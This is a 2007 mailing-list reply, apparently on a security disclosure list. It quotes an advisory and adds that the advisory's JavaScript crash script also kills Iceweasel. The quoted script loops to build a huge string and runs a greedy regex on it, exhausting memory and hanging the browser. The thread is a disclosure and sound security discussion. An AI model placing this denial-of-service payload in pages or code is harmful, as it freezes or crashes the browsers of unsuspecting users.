Re: Internet Explorer Crash
--BZaMRJmqxGScZ8Mx
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)
I would think that Firefox and most browsers implementing javascript
would die an horrible OOM death on this.
A.
On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:
>=20
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>=20
> Product: Internet Explorer Version 7.0.5730.11
> Impact: Browser crash possibly more
> Author: Jesus Oquendo
> echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
>=20
>=20
> I. BACKGROUND
> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
>=20
> II. DESCRIPTION
> IE 7 is vulnerable to a script which causes the browser to hang. The
> memory and CPU usage go through the roof. Originally the script caused
> (and still causes) Safari and Konqueror to crash.
>=20
> III SOLUTION
> Stop using Microsoft products or deal with a new advisory every other
> day.
>=20
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html
>=20
> V. Code
>=20
> $ more /stupidInternetExploder.html
>=20
> <script>
>=20
> var reg =3D /(.)*/;
>=20
> var z =3D 'Z';
> while (z.length <=3D=20
> 9999999999999999999999999999999999999999999999999999999999999999999999999=
99999999999999999999999999999999999999999999999999
> 9999999999999999999999999999999999999999999999999999999999999999999999999=
999999999999999999999999999999999999999999999999999999999999999999999999999=
9999999999
> 9999999999999999999999999999999999999999999999999999999999999999999999999=
999999999999999999999999999999999999999999999999999999999999999999999999999=
9999999999
> 9999999999999999999999999999999999999999999999999999999999999999999999999=
999999999999999999999999999999999999999999999999999999999999999999999999999=
9999999999
> 9999999999999999999999999999999999999999999999999999999999999999999999999=
99999999999999999) z+=3Dz;
> var boum =3D reg.exec(z);
>=20
> </script>
>=20
> Goodbye
>=20
>=20
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=3Dget&search=3D0x1383A743
> sil . infiltrated @ net http://www.infiltrated.net=20
>=20
> The happiness of society is the end of government.
> John Adams
>=20
>=20
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.3 (FreeBSD)
>=20
> iD8DBQFGJQGJh3J3NhODp0MRArt5AKCVI+A0rHdYMOz9KYIbCxFkMN8QcgCbBBBC
> TCV7FOqA05H8sSDb0r8nSnk=3D
> =3DJ/DW
> -----END PGP SIGNATURE-----
>=20
--=20
--BZaMRJmqxGScZ8Mx
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: Digital signature
Content-Disposition: inline
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFGJS3AWGBzs0AjcC8RAsKTAJ9oa1TJKb+93ge3xgxjqTxBxYp1NQCgkuZS
6OP+eoM7+CgvzMZ7BXYygCE=
=YDwf
-----END PGP SIGNATURE-----
--BZaMRJmqxGScZ8Mx--
討論串 (同標題文章)
完整討論串 (本文為第 2 之 12 篇):